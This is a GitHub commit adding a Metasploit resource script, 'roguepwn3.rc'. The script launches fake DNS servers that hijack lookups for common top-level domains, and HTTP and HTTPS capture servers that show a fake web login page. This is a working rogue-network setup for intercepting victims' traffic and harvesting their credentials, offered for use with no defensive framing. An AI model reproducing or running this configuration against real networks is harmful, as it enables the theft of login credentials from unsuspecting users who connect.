Create roguepwn3.rc

This commit is contained in:
Francesco Grotti
2017-02-19 17:25:27 +01:00
committed by GitHub
parent a4ced464af
commit 74e48fbff8

30
roguepwn3.rc Normal file
View File

@@ -0,0 +1,30 @@
use auxiliary/server/fakedns
set LogConsole true
set TARGETHOST 10.0.0.1
set SRVHOST 10.0.0.1
set TAGETDOMAIN *.com, *.org, *.it, *.net, *.edu. *.fr
set TARGET ACTION BYPASS
set SRVPORT 5353
run -j
use auxiliary/server/fakedns
set LogConsole true
set TARGETHOST 10.0.0.1
set SRVHOST 10.0.0.1
set TAGETDOMAIN *.com, *.org, *.it, *.net, *.edu, *.fr
set TARGET ACTION BYPASS
set SRVPORT 53
run -j
use auxiliary/server/capture/http
set SRVHOST 10.0.0.1
set TEMPLATE weblogin/index.html
set SRVPORT 80
run -j
use auxiliary/server/capture/http
set SRVHOST 10.0.0.1
set TEMPLATE weblogin/index.html
set SRVPORT 443
set SSL true
run -j